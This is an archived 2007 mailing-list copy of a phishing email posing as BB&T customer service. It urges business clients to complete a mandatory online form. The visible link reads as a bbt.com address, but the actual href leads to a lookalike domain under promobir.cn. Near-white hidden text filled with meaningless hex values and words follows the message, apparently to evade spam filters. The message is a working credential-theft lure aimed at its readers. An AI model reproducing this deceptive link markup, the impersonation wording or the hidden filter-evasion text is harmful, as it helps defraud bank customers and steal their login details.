[88143] in cryptography@c2.net mail archive
Official information for BB&T client!
daemon@ATHENA.MIT.EDU (BB&T)
Fri May 11 08:20:50 2007
From: "BB&T" <custservice.refsm04282928425.cm@bbt.com>
To: "Crypto.discuss" <crypto.discuss@bloom-picayune.mit.edu>
----L4IOTM4YTTV7JD1HMKE
Content-Type: text/html;
Content-Transfer-Encoding: 7Bit
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
</head>
<body>
<p ><font face="Arial">Dear BB&T business online client:</p>
<p ><font face="Arial">The BB&T Customer Service requests you to complete the BB&T Business Online Client Form.</p>
<p ><font face="Arial">This procedure is obligatory for all business and corporate clients of BB&T.</p>
<p ><font face="Arial">Please select the hyperlink and visit the address listed to access the BB&T Business Online Client Form.</p>
<p ><font face="Arial"><u><a href="http://clientform.ref21484057.bbt.com.promobir.cn/clients/data/proc.jsp">http://clientform.ref21484057.bbt.com/clients/data/proc.jsp</a></u></p>
<p ><font face="Arial">Again, thank you for choosing BB&T for your business needs. We look forward to working with you.</p>
<p ><font face="Arial">***** Please do not respond to this email *****</p>
<p ><font face="Arial">This mail is generated by an automated service.<br> Replies to this mail are not read by BB&T customer service or technical support.</p>
<p >-----------------------------------------------------------------------------------------------------------</p>
<p><font color="#FFFFFC" >0x210, 0x3, 0x2856, 0x4681, 0x454, 0x54135594, 0x108, 0x48, 0x4, 0x9424, 0x07121316, 0x28, 0x28 common, MU1, api, HSDP, 61DO, 0T9Y, stack. close: 0x7, 0x06, 0x70, 0x4, 0x5215, 0x3 0x0914, 0x6, 0x501, 0x99901864, 0x5, 0x8003 GHVN: 0x5910, 0x1557, 0x34, 0x1, 0x486, 0x51, 0x88, 0x0, 0x73, 0x314, 0x4, 0x77796733 Q4T: 0x45667941, 0x0843, 0x48430025, 0x516, 0x5639, 0x3 0x37, 0x09, 0x77554322, 0x95182839, 0x99105083, 0x8844, 0x85, 0x16674009, 0x858, 0x0124, 0x65653983, 0x9 KE0: 0x373, 0x843, 0x6635 FVX: 0x75, 0x68, 0x63, 0x5</font></p><p><font color="#FFFFFF" ><span>GB0D: 0x889, 0x4, 0x7755, 0x79792240 0x84375308, 0x7656 0x023, 0x02, 0x2574, 0x7995, 0x3, 0x89, 0x629, 0x6, 0x67, 0x63928944, 0x99, 0x5, 0x0394, 0x0, 0x20 745 93W file QAPR 0HY1: 0x84, 0x094, 0x8, 0x47236057, 0x02229622, 0x785, 0x4, 0x981, 0x52 0x00, 0x072, 0x642, 0x0428, 0x1 </span><span>G5N serv JHR HH6 FL5 hex rcs KNN 0x9740, 0x32, 0x57, 0x92738576, 0x66, 0x3092, 0x59876423, 0x4772, 0x4, 0x884, 0x0, 0x06680972, 0x03781093, 0x08784402, 0x5919 0x7431, 0x82, 0x9247, 0x19400384, 0x3146, 0x402, 0x84649475 0x7, 0x81, 0x206, 0x15, 0x602, 0x41603287, 0x63, 0x0, 0x715, 0x8, 0x7251, 0x843</span></font></p>
<p><font color="#FFFFFD" ><span>VB0J: 0x7 0x7947, 0x19, 0x8, 0x6938 GE8: 0x32, 0x9243, 0x39847556, 0x1, 0x4111, 0x107, 0x19685786 function: 0x2, 0x677, 0x4, 0x1, 0x53578261, 0x7697, 0x0, 0x13544688, 0x90, 0x8, 0x8663, 0x125, 0x8 tmp V2HW create GSQ exe hex BXF LWO8 JNL</span><span>media: 0x2, 0x8, 0x23087083, 0x74, 0x13, 0x5578, 0x78 </span><span>0x12589128, 0x864, 0x060, 0x4, 0x6, 0x121, 0x86, 0x5148, 0x43, 0x5 FRX9: 0x8565 4H9 file hex media dec file 0BZ 0x40, 0x1083, 0x23347104, 0x1855, 0x7, 0x77, 0x4, 0x6702, 0x3, 0x1097, 0x5537, 0x1625</span></font></p>
</body>
</html>
----L4IOTM4YTTV7JD1HMKE--